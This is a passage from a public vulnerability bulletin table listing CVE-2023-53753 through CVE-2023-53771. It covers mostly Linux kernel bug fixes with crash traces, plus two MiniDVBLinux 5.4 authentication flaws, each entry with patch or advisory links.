https://git.kernel.org/stable/c/31cf7853a940181593e4472fc56f46574123f9f6 https://git.kernel.org/stable/c/e4ffc47a1c3e5d11a853aa178c9a5136e79412e9 https://git.kernel.org/stable/c/bf7da02d2b8faf324206e1cbe64a4813ff903cc1 https://git.kernel.org/stable/c/915d975b2ffa58a14bfcf16fafe00c41315949ff |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: fix mapping to non-allocated address [Why] There is an issue mapping non-allocated location of memory. It would allocate gpio registers from an array out of bounds. [How] Patch correct numbers of bounds for using. | 2025-12-08 | not yet calculated | CVE-2023-53753 | https://git.kernel.org/stable/c/8ce8a443ddd9002861a4ee8a7e33a0c02717422f https://git.kernel.org/stable/c/24aaf6603600d6d1159973c809ea2737664b28c4 https://git.kernel.org/stable/c/9190d4a263264eabf715f5fc1827da45e3fdc247 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Fix ioremap issues in lpfc_sli4_pci_mem_setup() When if_type equals zero and pci_resource_start(pdev, PCI_64BIT_BAR4) returns false, drbl_regs_memmap_p is not remapped. This passes a NULL pointer to iounmap(), which can trigger a WARN() on certain arches. When if_type equals six and pci_resource_start(pdev, PCI_64BIT_BAR4) returns true, drbl_regs_memmap_p may has been remapped and ctrl_regs_memmap_p is not remapped. This is a resource leak and passes a NULL pointer to iounmap(). To fix these issues, we need to add null checks before iounmap(), and change some goto labels. | 2025-12-08 | not yet calculated | CVE-2023-53754 | https://git.kernel.org/stable/c/74d90f92eafe8ccd12827228236a28a94eda6bcc https://git.kernel.org/stable/c/bab8dc38b1a0a12bc064fc064269033bdcf5b88e https://git.kernel.org/stable/c/fd8c83d8375b9dac1949f2753485a5c055ebfad0 https://git.kernel.org/stable/c/e6f1ef4a53856ed000b0f7265d7e16dcb00f4243 https://git.kernel.org/stable/c/631d0fab143bef85ea0813596f1dda36e2b9724c https://git.kernel.org/stable/c/7e5a54d1f00725a739dcd20f616d82eff4f764bd https://git.kernel.org/stable/c/91a0c0c1413239d0548b5aac4c82f38f6d53a91e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: ptdma: check for null desc before calling pt_cmd_callback Resolves a panic that can occur on AMD systems, typically during host shutdown, after the PTDMA driver had been exercised. The issue was the pt_issue_pending() function is mistakenly assuming that there will be at least one descriptor in the Submitted queue when the function is called. However, it is possible that both the Submitted and Issued queues could be empty, which could result in pt_cmd_callback() being mistakenly called with a NULL pointer. Ref: Bugzilla Bug 216856. | 2025-12-08 | not yet calculated | CVE-2023-53755 | https://git.kernel.org/stable/c/8ae2113702613207efc05453bc9a3df2b992bf45 https://git.kernel.org/stable/c/5bba023b1241c7af5d40447503a68de282ad5190 https://git.kernel.org/stable/c/928469986171a6f763b34b039427f5667ba3fd50 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: VMX: Fix crash due to uninitialized current_vmcs KVM enables 'Enlightened VMCS' and 'Enlightened MSR Bitmap' when running as a nested hypervisor on top of Hyper-V. When MSR bitmap is updated, evmcs_touch_msr_bitmap function uses current_vmcs per-cpu variable to mark that the msr bitmap was changed. vmx_vcpu_create() modifies the msr bitmap via vmx_disable_intercept_for_msr -> vmx_msr_bitmap_l01_changed which in the end calls this function. The function checks for current_vmcs if it is null but the check is insufficient because current_vmcs is not initialized. Because of this, the code might incorrectly write to the structure pointed by current_vmcs value left by another task. Preemption is not disabled, the current task can be preempted and moved to another CPU while current_vmcs is accessed multiple times from evmcs_touch_msr_bitmap() which leads to crash. The manipulation of MSR bitmaps by callers happens only for vmcs01 so the solution is to use vmx->vmcs01.vmcs instead of current_vmcs. BUG: kernel NULL pointer dereference, address: 0000000000000338 PGD 4e1775067 P4D 0 Oops: 0002 [#1] PREEMPT SMP NOPTI ... RIP: 0010:vmx_msr_bitmap_l01_changed+0x39/0x50 [kvm_intel] ... Call Trace: vmx_disable_intercept_for_msr+0x36/0x260 [kvm_intel] vmx_vcpu_create+0xe6/0x540 [kvm_intel] kvm_arch_vcpu_create+0x1d1/0x2e0 [kvm] kvm_vm_ioctl_create_vcpu+0x178/0x430 [kvm] kvm_vm_ioctl+0x53f/0x790 [kvm] __x64_sys_ioctl+0x8a/0xc0 do_syscall_64+0x5c/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd | 2025-12-08 | not yet calculated | CVE-2023-53756 | https://git.kernel.org/stable/c/6baebcecf09acd19e2bab1c2911dcdba5d48a1dc https://git.kernel.org/stable/c/6e7bc50f97c9855da83f1478f722590defd45ff2 https://git.kernel.org/stable/c/b2de2b4d4e007f9add46ea8dc06f781835e3ea9f https://git.kernel.org/stable/c/3ba95cc671c025d0d2a1c7d5e2930f0ff0980cf4 https://git.kernel.org/stable/c/93827a0a36396f2fd6368a54a020f420c8916e9b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: irqchip/irq-mvebu-gicp: Fix refcount leak in mvebu_gicp_probe of_irq_find_parent() returns a node pointer with refcount incremented, We should use of_node_put() on it when not needed anymore. Add missing of_node_put() to avoid refcount leak. | 2025-12-08 | not yet calculated | CVE-2023-53757 | https://git.kernel.org/stable/c/d6b99b9b5e354f9c801a3cc3b1d4881d920e1718 https://git.kernel.org/stable/c/4545d7a70ce0fc78b1d3c33c4a0939a86f363b57 https://git.kernel.org/stable/c/c7d78d36e19eeb74a1c12799fbadbcdbaf36c0bd https://git.kernel.org/stable/c/cee12e8be8e227731a845ae43a4c9ce2e404be45 https://git.kernel.org/stable/c/88cb93d3a16f706bd7213f8a5882c394e5d10c4e https://git.kernel.org/stable/c/bb755e020abc24793b9411c9419ed43f07f9a03d https://git.kernel.org/stable/c/91e149b201bdb68c77011d50d011e47fadbcc8bd https://git.kernel.org/stable/c/9419e700021a393f67be36abd0c4f3acc6139041 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: atmel-quadspi: Free resources even if runtime resume failed in .remove() An early error exit in atmel_qspi_remove() doesn't prevent the device unbind. So this results in an spi controller with an unbound parent and unmapped register space (because devm_ioremap_resource() is undone). So using the remaining spi controller probably results in an oops. Instead unregister the controller unconditionally and only skip hardware access and clk disable. Also add a warning about resume failing and return zero unconditionally. The latter has the only effect to suppress a less helpful error message by the spi core. | 2025-12-08 | not yet calculated | CVE-2023-53758 | https://git.kernel.org/stable/c/f6974fb20499e3b6522daa7aec822aac11dfcf42 https://git.kernel.org/stable/c/618770d4d8e40b7f8ed9eb5f210cd9164dfac47d https://git.kernel.org/stable/c/77806d7c9bebe40a8cdce2b8d30fbe6511745df8 https://git.kernel.org/stable/c/9448bc1dee65f86c0fe64d9dea8b410af0586886 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: hidraw: fix data race on device refcount The hidraw_open() function increments the hidraw device reference counter. The counter has no dedicated synchronization mechanism, resulting in a potential data race when concurrently opening a device. The race is a regression introduced by commit 8590222e4b02 ("HID: hidraw: Replace hidraw device table mutex with a rwsem"). While minors_rwsem is intended to protect the hidraw_table itself, by instead acquiring the lock for writing, the reference counter is also protected. This is symmetrical to hidraw_release(). | 2025-12-08 | not yet calculated | CVE-2023-53759 | https://git.kernel.org/stable/c/879e79c3aead41b8aa2e91164354b30bd1c4ef3b https://git.kernel.org/stable/c/ff348eabd97577da974d3db7038857f28c61d2bd https://git.kernel.org/stable/c/05b47034e2488c2924e5c032e20a1979d012b5b5 https://git.kernel.org/stable/c/944ee77dc6ec7b0afd8ec70ffc418b238c92f12b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: mcq: Fix &hwq->cq_lock deadlock issue When ufshcd_err_handler() is executed, CQ event interrupt can enter waiting for the same lock. This can happen in ufshcd_handle_mcq_cq_events() and also in ufs_mtk_mcq_intr(). The following warning message will be generated when &hwq->cq_lock is used in IRQ context with IRQ enabled. Use ufshcd_mcq_poll_cqe_lock() with spin_lock_irqsave instead of spin_lock to resolve the deadlock issue. [name:lockdep&]WARNING: inconsistent lock state [name:lockdep&]-------------------------------- [name:lockdep&]inconsistent {IN-HARDIRQ-W} -> {HARDIRQ-ON-W} usage. [name:lockdep&]kworker/u16:4/260 [HC0[0]:SC0[0]:HE1:SE1] takes: ffffff8028444600 (&hwq->cq_lock){?.-.}-{2:2}, at: ufshcd_mcq_poll_cqe_lock+0x30/0xe0 [name:lockdep&]{IN-HARDIRQ-W} state was registered at: lock_acquire+0x17c/0x33c _raw_spin_lock+0x5c/0x7c ufshcd_mcq_poll_cqe_lock+0x30/0xe0 ufs_mtk_mcq_intr+0x60/0x1bc [ufs_mediatek_mod] __handle_irq_event_percpu+0x140/0x3ec handle_irq_event+0x50/0xd8 handle_fasteoi_irq+0x148/0x2b0 generic_handle_domain_irq+0x4c/0x6c gic_handle_irq+0x58/0x134 call_on_irq_stack+0x40/0x74 do_interrupt_handler+0x84/0xe4 el1_interrupt+0x3c/0x78 <snip> Possible unsafe locking scenario: CPU0 ---- lock(&hwq->cq_lock); <Interrupt> lock(&hwq->cq_lock); *** DEADLOCK *** 2 locks held by kworker/u16:4/260: [name:lockdep&] stack backtrace: CPU: 7 PID: 260 Comm: kworker/u16:4 Tainted: G S W OE 6.1.17-mainline-android14-2-g277223301adb #1 Workqueue: ufs_eh_wq_0 ufshcd_err_handler Call trace: dump_backtrace+0x10c/0x160 show_stack+0x20/0x30 dump_stack_lvl+0x98/0xd8 dump_stack+0x20/0x60 print_usage_bug+0x584/0x76c mark_lock_irq+0x488/0x510 mark_lock+0x1ec/0x25c __lock_acquire+0x4d8/0xffc lock_acquire+0x17c/0x33c _raw_spin_lock+0x5c/0x7c ufshcd_mcq_poll_cqe_lock+0x30/0xe0 ufshcd_poll+0x68/0x1b0 ufshcd_transfer_req_compl+0x9c/0xc8 ufshcd_err_handler+0x3bc/0xea0 process_one_work+0x2f4/0x7e8 worker_thread+0x234/0x450 kthread+0x110/0x134 ret_from_fork+0x10/0x20 | 2025-12-08 | not yet calculated | CVE-2023-53760 | https://git.kernel.org/stable/c/2ce8c49c7b53e0a2258b833eeab16a6d78f732d1 https://git.kernel.org/stable/c/948afc69615167a3c82430f99bfd046332b89912 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: usbtmc: Fix direction for 0-length ioctl control messages The syzbot fuzzer found a problem in the usbtmc driver: When a user submits an ioctl for a 0-length control transfer, the driver does not check that the direction is set to OUT: ------------[ cut here ]------------ usb 3-1: BOGUS control dir, pipe 80000b80 doesn't match bRequestType fd WARNING: CPU: 0 PID: 5100 at drivers/usb/core/urb.c:411 usb_submit_urb+0x14a7/0x1880 drivers/usb/core/urb.c:411 Modules linked in: CPU: 0 PID: 5100 Comm: syz-executor428 Not tainted 6.3.0-syzkaller-12049-g58390c8ce1bd #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/14/2023 RIP: 0010:usb_submit_urb+0x14a7/0x1880 drivers/usb/core/urb.c:411 Code: 7c 24 40 e8 1b 13 5c fb 48 8b 7c 24 40 e8 21 1d f0 fe 45 89 e8 44 89 f1 4c 89 e2 48 89 c6 48 c7 c7 e0 b5 fc 8a e8 19 c8 23 fb <0f> 0b e9 9f ee ff ff e8 ed 12 5c fb 0f b6 1d 12 8a 3c 08 31 ff 41 RSP: 0018:ffffc90003d2fb00 EFLAGS: 00010282 RAX: 0000000000000000 RBX: ffff8880789e9058 RCX: 0000000000000000 RDX: ffff888029593b80 RSI: ffffffff814c1447 RDI: 0000000000000001 RBP: ffff88801ea742f8 R08: 0000000000000001 R09: 0000000000000000 R10: 0000000000000001 R11: 0000000000000001 R12: ffff88802915e528 R13: 00000000000000fd R14: 0000000080000b80 R15: ffff8880222b3100 FS: 0000555556ca63c0(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f9ef4d18150 CR3: 0000000073e5b000 CR4: 00000000003506f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> usb_start_wait_urb+0x101/0x4b0 drivers/usb/core/message.c:58 usb_internal_control_msg drivers/usb/core/message.c:102 [inline] usb_control_msg+0x320/0x4a0 drivers/usb/core/message.c:153 usbtmc_ioctl_request drivers/usb/class/usbtmc.c:1954 [inline] usbtmc_ioctl+0x1b3d/0x2840 drivers/usb/class/usbtmc.c:2097 To fix this, we must override the direction in the bRequestType field of the control request structure when the length is 0. | 2025-12-08 | not yet calculated | CVE-2023-53761 | https://git.kernel.org/stable/c/7cef7681aa7719ff585dd06113a061ab2def7da0 https://git.kernel.org/stable/c/6340e432cf70bf156b19c6f5dd737d940eca02a3 https://git.kernel.org/stable/c/3b43d9df27a708f4079d518b879f517fea150a91 https://git.kernel.org/stable/c/0ced12bdf624d8d8977ddb16eb130cd479d92bcf https://git.kernel.org/stable/c/50775a046c68e1d157d5e413cae2e5e00da1c463 https://git.kernel.org/stable/c/94d25e9128988c6a1fc9070f6e98215a95795bd8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_sync: Fix UAF in hci_disconnect_all_sync Use-after-free can occur in hci_disconnect_all_sync if a connection is deleted by concurrent processing of a controller event. To prevent this the code now tries to iterate over the list backwards to ensure the links are cleanup before its parents, also it no longer relies on a cursor, instead it always uses the last element since hci_abort_conn_sync is guaranteed to call hci_conn_del. UAF crash log: ================================================================== BUG: KASAN: slab-use-after-free in hci_set_powered_sync (net/bluetooth/hci_sync.c:5424) [bluetooth] Read of size 8 at addr ffff888009d9c000 by task kworker/u9:0/124 CPU: 0 PID: 124 Comm: kworker/u9:0 Tainted: G W 6.5.0-rc1+ #10 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-1.fc38 04/01/2014 Workqueue: hci0 hci_cmd_sync_work [bluetooth] Call Trace: <TASK> dump_stack_lvl+0x5b/0x90 print_report+0xcf/0x670 ? __virt_addr_valid+0xdd/0x160 ? hci_set_powered_sync+0x2c9/0x4a0 [bluetooth] kasan_report+0xa6/0xe0 ? hci_set_powered_sync+0x2c9/0x4a0 [bluetooth] ? __pfx_set_powered_sync+0x10/0x10 [bluetooth] hci_set_powered_sync+0x2c9/0x4a0 [bluetooth] ? __pfx_hci_set_powered_sync+0x10/0x10 [bluetooth] ? __pfx_lock_release+0x10/0x10 ? __pfx_set_powered_sync+0x10/0x10 [bluetooth] hci_cmd_sync_work+0x137/0x220 [bluetooth] process_one_work+0x526/0x9d0 ? __pfx_process_one_work+0x10/0x10 ? __pfx_do_raw_spin_lock+0x10/0x10 ? mark_held_locks+0x1a/0x90 worker_thread+0x92/0x630 ? __pfx_worker_thread+0x10/0x10 kthread+0x196/0x1e0 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x2c/0x50 </TASK> Allocated by task 1782: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 __kasan_kmalloc+0x8f/0xa0 hci_conn_add+0xa5/0xa80 [bluetooth] hci_bind_cis+0x881/0x9b0 [bluetooth] iso_connect_cis+0x121/0x520 [bluetooth] iso_sock_connect+0x3f6/0x790 [bluetooth] __sys_connect+0x109/0x130 __x64_sys_connect+0x40/0x50 do_syscall_64+0x60/0x90 entry_SYSCALL_64_after_hwframe+0x6e/0xd8 Freed by task 695: kasan_save_stack+0x33/0x60 kasan_set_track+0x25/0x30 kasan_save_free_info+0x2b/0x50 __kasan_slab_free+0x10a/0x180 __kmem_cache_free+0x14d/0x2e0 device_release+0x5d/0xf0 kobject_put+0xdf/0x270 hci_disconn_complete_evt+0x274/0x3a0 [bluetooth] hci_event_packet+0x579/0x7e0 [bluetooth] hci_rx_work+0x287/0xaa0 [bluetooth] process_one_work+0x526/0x9d0 worker_thread+0x92/0x630 kthread+0x196/0x1e0 ret_from_fork+0x2c/0x50 ================================================================== | 2025-12-08 | not yet calculated | CVE-2023-53762 | https://git.kernel.org/stable/c/a30c074f0b5b7f909a15c978fbc96a29e2f94e42 https://git.kernel.org/stable/c/ba3ba53ce1f76fc372b8f918fece4f9b1e41acd4 https://git.kernel.org/stable/c/94d9ba9f9888b748d4abd2aa1547af56ae85f772 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "f2fs: fix to do sanity check on extent cache correctly" syzbot reports a f2fs bug as below: UBSAN: array-index-out-of-bounds in fs/f2fs/f2fs.h:3275:19 index 1409 is out of range for type '__le32[923]' (aka 'unsigned int[923]') Call Trace: __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x1e7/0x2d0 lib/dump_stack.c:106 ubsan_epilogue lib/ubsan.c:217 [inline] __ubsan_handle_out_of_bounds+0x11c/0x150 lib/ubsan.c:348 inline_data_addr fs/f2fs/f2fs.h:3275 [inline] __recover_inline_status fs/f2fs/inode.c:113 [inline] do_read_inode fs/f2fs/inode.c:480 [inline] f2fs_iget+0x4730/0x48b0 fs/f2fs/inode.c:604 f2fs_fill_super+0x640e/0x80c0 fs/f2fs/super.c:4601 mount_bdev+0x276/0x3b0 fs/super.c:1391 legacy_get_tree+0xef/0x190 fs/fs_context.c:611 vfs_get_tree+0x8c/0x270 fs/super.c:1519 do_new_mount+0x28f/0xae0 fs/namespace.c:3335 do_mount fs/namespace.c:3675 [inline] __do_sys_mount fs/namespace.c:3884 [inline] __se_sys_mount+0x2d9/0x3c0 fs/namespace.c:3861 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x41/0xc0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd The issue was bisected to: commit d48a7b3a72f121655d95b5157c32c7d555e44c05 Author: Chao Yu <chao@kernel.org> Date: Mon Jan 9 03:49:20 2023 +0000 f2fs: fix to do sanity check on extent cache correctly The root cause is we applied both v1 and v2 of the patch, v2 is the right fix, so it needs to revert v1 in order to fix reported issue. v1: commit d48a7b3a72f1 ("f2fs: fix to do sanity check on extent cache correctly") https://lore.kernel.org/lkml/20230109034920.492914-1-chao@kernel.org/ v2: commit 269d11948100 ("f2fs: fix to do sanity check on extent cache correctly") https://lore.kernel.org/lkml/20230207134808.1827869-1-chao@kernel.org/ | 2025-12-08 | not yet calculated | CVE-2023-53763 | https://git.kernel.org/stable/c/0d545a8e77cbd1fbad311b18952e38e0f7672ab4 https://git.kernel.org/stable/c/ea35767edc78327c686e21fe1231b668f11be0db https://git.kernel.org/stable/c/bbb3cd66301ef752fae2922452660f228d69bcaf https://git.kernel.org/stable/c/958ccbbf1ce716d77c7cfa79ace50a421c1eed73 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: Handle lock during peer_id find ath12k_peer_find_by_id() requires that the caller hold the ab->base_lock. Currently the WBM error path does not hold the lock and calling that function, leads to the following lockdep_assert()in QCN9274: [105162.160893] ------------[ cut here ]------------ [105162.160916] WARNING: CPU: 3 PID: 0 at drivers/net/wireless/ath/ath12k/peer.c:71 ath12k_peer_find_by_id+0x52/0x60 [ath12k] [105162.160933] Modules linked in: ath12k(O) qrtr_mhi qrtr mac80211 cfg80211 mhi qmi_helpers libarc4 nvme nvme_core [last unloaded: ath12k(O)] [105162.160967] CPU: 3 PID: 0 Comm: swapper/3 Tainted: G W O 6.1.0-rc2+ #3 [105162.160972] Hardware name: Intel(R) Client Systems NUC8i7HVK/NUC8i7HVB, BIOS HNKBLi70.86A.0056.2019.0506.1527 05/06/2019 [105162.160977] RIP: 0010:ath12k_peer_find_by_id+0x52/0x60 [ath12k] [105162.160990] Code: 07 eb 0f 39 68 24 74 0a 48 8b 00 48 39 f8 75 f3 31 c0 5b 5d c3 48 8d bf b0 f2 00 00 be ff ff ff ff e8 22 20 c4 e2 85 c0 75 bf <0f> 0b eb bb 66 2e 0f 1f 84 00 00 00 00 00 41 54 4c 8d a7 98 f2 00 [105162.160996] RSP: 0018:ffffa223001acc60 EFLAGS: 00010246 [105162.161003] RAX: 0000000000000000 RBX: ffff9f0573940000 RCX: 0000000000000000 [105162.161008] RDX: 0000000000000001 RSI: ffffffffa3951c8e RDI: ffffffffa39a96d7 [105162.161013] RBP: 000000000000000a R08: 0000000000000000 R09: 0000000000000000 [105162.161017] R10: ffffa223001acb40 R11: ffffffffa3d57c60 R12: ffff9f057394f2e0 [105162.161022] R13: ffff9f0573940000 R14: ffff9f04ecd659c0 R15: ffff9f04d5a9b040 [105162.161026] FS: 0000000000000000(0000) GS:ffff9f0575600000(0000) knlGS:0000000000000000 [105162.161031] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [105162.161036] CR2: 00001d5c8277a008 CR3: 00000001e6224006 CR4: 00000000003706e0 [105162.161041] Call Trace: [105162.161046] <IRQ> [105162.161051] ath12k_dp_rx_process_wbm_err+0x6da/0xaf0 [ath12k] [105162.161072] ? ath12k_dp_rx_process_err+0x80e/0x15a0 [ath12k] [105162.161084] ? __lock_acquire+0x4ca/0x1a60 [105162.161104] ath12k_dp_service_srng+0x263/0x310 [ath12k] [105162.161120] ath12k_pci_ext_grp_napi_poll+0x1c/0x70 [ath12k] [105162.161133] __napi_poll+0x22/0x260 [105162.161141] net_rx_action+0x2f8/0x380 [105162.161153] __do_softirq+0xd0/0x4c9 [105162.161162] irq_exit_rcu+0x88/0xe0 [105162.161169] common_interrupt+0xa5/0xc0 [105162.161174] </IRQ> [105162.161179] <TASK> [105162.161184] asm_common_interrupt+0x22/0x40 Handle spin lock/unlock in WBM error path to hold the necessary lock expected by ath12k_peer_find_by_id(). Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.0-03171-QCAHKSWPL_SILICONZ-1 | 2025-12-08 | not yet calculated | CVE-2023-53764 | https://git.kernel.org/stable/c/9faf7c696610a348ca94a224d55c946b19b3279d https://git.kernel.org/stable/c/95a389e2ff3212d866cc51c77d682d2934074eb8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm cache: free background tracker's queued work in btracker_destroy Otherwise the kernel can BUG with: [ 2245.426978] ============================================================================= [ 2245.435155] BUG bt_work (Tainted: G B W ): Objects remaining in bt_work on __kmem_cache_shutdown() [ 2245.445233] ----------------------------------------------------------------------------- [ 2245.445233] [ 2245.454879] Slab 0x00000000b0ce2b30 objects=64 used=2 fp=0x000000000a3c6a4e flags=0x17ffffc0000200(slab|node=0|zone=2|lastcpupid=0x1fffff) [ 2245.467300] CPU: 7 PID: 10805 Comm: lvm Kdump: loaded Tainted: G B W 6.0.0-rc2 #19 [ 2245.476078] Hardware name: Dell Inc. PowerEdge R7525/0590KW, BIOS 2.5.6 10/06/2021 [ 2245.483646] Call Trace: [ 2245.486100] <TASK> [ 2245.488206] dump_stack_lvl+0x34/0x48 [ 2245.491878] slab_err+0x95/0xcd [ 2245.495028] __kmem_cache_shutdown.cold+0x31/0x136 [ 2245.499821] kmem_cache_destroy+0x49/0x130 [ 2245.503928] btracker_destroy+0x12/0x20 [dm_cache] [ 2245.508728] smq_destroy+0x15/0x60 [dm_cache_smq] [ 2245.513435] dm_cache_policy_destroy+0x12/0x20 [dm_cache] [ 2245.518834] destroy+0xc0/0x110 [dm_cache] [ 2245.522933] dm_table_destroy+0x5c/0x120 [dm_mod] [ 2245.527649] __dm_destroy+0x10e/0x1c0 [dm_mod] [ 2245.532102] dev_remove+0x117/0x190 [dm_mod] [ 2245.536384] ctl_ioctl+0x1a2/0x290 [dm_mod] [ 2245.540579] dm_ctl_ioctl+0xa/0x20 [dm_mod] [ 2245.544773] __x64_sys_ioctl+0x8a/0xc0 [ 2245.548524] do_syscall_64+0x5c/0x90 [ 2245.552104] ? syscall_exit_to_user_mode+0x12/0x30 [ 2245.556897] ? do_syscall_64+0x69/0x90 [ 2245.560648] ? do_syscall_64+0x69/0x90 [ 2245.564394] entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 2245.569447] RIP: 0033:0x7fe52583ec6b ... [ 2245.646771] ------------[ cut here ]------------ [ 2245.651395] kmem_cache_destroy bt_work: Slab cache still has objects when called from btracker_destroy+0x12/0x20 [dm_cache] [ 2245.651408] WARNING: CPU: 7 PID: 10805 at mm/slab_common.c:478 kmem_cache_destroy+0x128/0x130 Found using: lvm2-testsuite --only "cache-single-split.sh" Ben bisected and found that commit 0495e337b703 ("mm/slab_common: Deleting kobject in kmem_cache_destroy() without holding slab_mutex/cpu_hotplug_lock") first exposed dm-cache's incomplete cleanup of its background tracker work objects. | 2025-12-08 | not yet calculated | CVE-2023-53765 | https://git.kernel.org/stable/c/673a3af21d5e3ed769f3eaed0c888244290a3506 https://git.kernel.org/stable/c/ed56ad5cacb7a3aeb611494d5d66e2399d2bfecc https://git.kernel.org/stable/c/95ab80a8a0fef2ce0cc494a306dd283948066ce7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: FS: JFS: Check for read-only mounted filesystem in txBegin This patch adds a check for read-only mounted filesystem in txBegin before starting a transaction potentially saving from NULL pointer deref. | 2025-12-08 | not yet calculated | CVE-2023-53766 | https://git.kernel.org/stable/c/a88efca805bea93cea9187dfd00835aa7093bf1b https://git.kernel.org/stable/c/97c1f26e4d4af55e8584e4646dd5c5fa7baf62c7 https://git.kernel.org/stable/c/2a8807f9f511c64de0c7cc9900a1683e3d72a3e5 https://git.kernel.org/stable/c/5c094ca994824e038b6a97835ded4e5d1d808504 https://git.kernel.org/stable/c/2febd5f81e4bfba61d9f374dcca628aff374cc56 https://git.kernel.org/stable/c/aa7cdf487ab3fa47284daaccc3d7d5de01c6a84c https://git.kernel.org/stable/c/b0ed8ed0428ee96092da6fefa5cfacbe4abed701 https://git.kernel.org/stable/c/95e2b352c03b0a86c5717ba1d24ea20969abcacc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: fix memory leak in ath12k_qmi_driver_event_work() Currently the buffer pointed by event is not freed in case ATH12K_FLAG_UNREGISTERING bit is set, this causes memory leak. Add a goto skip instead of return, to ensure event and all the list entries are freed properly. Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.0.1-00029-QCAHKSWPL_SILICONZ-1 | 2025-12-08 | not yet calculated | CVE-2023-53767 | https://git.kernel.org/stable/c/a87f59041a7f77b4bdab05cea60ac6adc69dc5d2 https://git.kernel.org/stable/c/960412bee0ea75f6b3c2dca4a3535795ee84c47a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regmap-irq: Fix out-of-bounds access when allocating config buffers When allocating the 2D array for handling IRQ type registers in regmap_add_irq_chip_fwnode(), the intent is to allocate a matrix with num_config_bases rows and num_config_regs columns. This is currently handled by allocating a buffer to hold a pointer for each row (i.e. num_config_bases). After that, the logic attempts to allocate the memory required to hold the register configuration for each row. However, instead of doing this allocation for each row (i.e. num_config_bases allocations), the logic erroneously does this allocation num_config_regs number of times. This scenario can lead to out-of-bounds accesses when num_config_regs is greater than num_config_bases. Fix this by updating the terminating condition of the loop that allocates the memory for holding the register configuration to allocate memory only for each row in the matrix. Amit Pundir reported a crash that was occurring on his db845c device due to memory corruption (see "Closes" tag for Amit's report). The KASAN report below helped narrow it down to this issue: [ 14.033877][ T1] ================================================================== [ 14.042507][ T1] BUG: KASAN: invalid-access in regmap_add_irq_chip_fwnode+0x594/0x1364 [ 14.050796][ T1] Write of size 8 at addr 06ffff8081021850 by task init/1 [ 14.242004][ T1] The buggy address belongs to the object at ffffff8081021850 [ 14.242004][ T1] which belongs to the cache kmalloc-8 of size 8 [ 14.255669][ T1] The buggy address is located 0 bytes inside of [ 14.255669][ T1] 8-byte region [ffffff8081021850, ffffff8081021858) | 2025-12-08 | not yet calculated | CVE-2023-53768 | https://git.kernel.org/stable/c/b1a726ad33e585e3d9fa70712df31ae105e4532c https://git.kernel.org/stable/c/6e7b2337ecd028bd888a1a0be4115b8a88faf838 https://git.kernel.org/stable/c/963b54df82b6d6206d7def273390bf3f7af558e1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: virt/coco/sev-guest: Double-buffer messages The encryption algorithms read and write directly to shared unencrypted memory, which may leak information as well as permit the host to tamper with the message integrity. Instead, copy whole messages in or out as needed before doing any computation on them. | 2025-12-08 | not yet calculated | CVE-2023-53769 | https://git.kernel.org/stable/c/577a64725bfd77645986168e953d405067ee565b https://git.kernel.org/stable/c/c27dafc4aa50a29ec927b3aa84ac7b430071f682 https://git.kernel.org/stable/c/4b69c63f716cfda38e1210e65b68f67f6cee2ddf https://git.kernel.org/stable/c/965006103a14703cc42043bbf9b5e0cdf7a468ad |
| MiniDVBLinux--MiniDVBLinux(TM) Distribution (MLD) | MiniDVBLinux 5.4 contains an unauthenticated configuration download vulnerability that allows remote attackers to access sensitive system configuration files through a direct object reference. Attackers can exploit the backup download endpoint by sending a GET request with 'action=getconfig' to retrieve a complete system configuration archive containing sensitive credentials. | 2025-12-09 | not yet calculated | CVE-2023-53770 | ExploitDB-51091 Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5713) VulnCheck Advisory: MiniDVBLinux 5.4 Unauthenticated Configuration Download via Backup Endpoint |
| MiniDVBLinux--MiniDVBLinux Change Root Password PoC | MiniDVBLinux 5.4 contains an authentication bypass vulnerability that allows remote attackers to change the root password without authentication. Attackers can send crafted POST requests to the system setup endpoint with modified SYSTEM_PASSWORD parameters to reset root credentials. | 2025-12-09 | not yet calculated | CVE-2023-53771 | ExploitDB-51094 Zero Science Lab Disclosure (ZSL-2022-5715) Official Product Homepage VulnCheck Advisory: MiniDVBLinux 5.4 Unauthenticated Root Password Change via System Setup |
